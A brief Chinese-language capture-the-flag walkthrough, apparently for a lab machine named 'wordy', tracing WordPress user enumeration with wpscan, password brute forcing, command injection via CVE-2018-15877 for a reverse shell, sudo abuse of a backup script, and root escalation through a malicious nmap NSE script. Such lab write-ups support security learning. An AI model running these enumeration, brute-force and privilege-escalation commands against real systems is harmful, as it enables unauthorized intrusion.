wpscan --url http://wordy/ --enumerate u
得到admin jens graham sarah mark
根据clue生成密码字典，msf爆破得到mark的口令helpdesk01，登录后台
发现activity monitor插件，找到CVE-2018-15877可以利用，Tools里面的IP tools功能存在命令注入漏洞，获得反弹shell，得到graham的口令GSo7isUM1D4
sudo -l发现可以用jens身份执行/home/jens/backups.sh，于是改写backups.sh为/bin/bash，得到jens的shell
sudo -l发现可以用root身份执行nmap，于是用nmap脚本成功提权
echo 'os.execute("/bin/sh")' > /tmp/rootshell.nse
sudo nmap --script=/tmp/rootshell.nse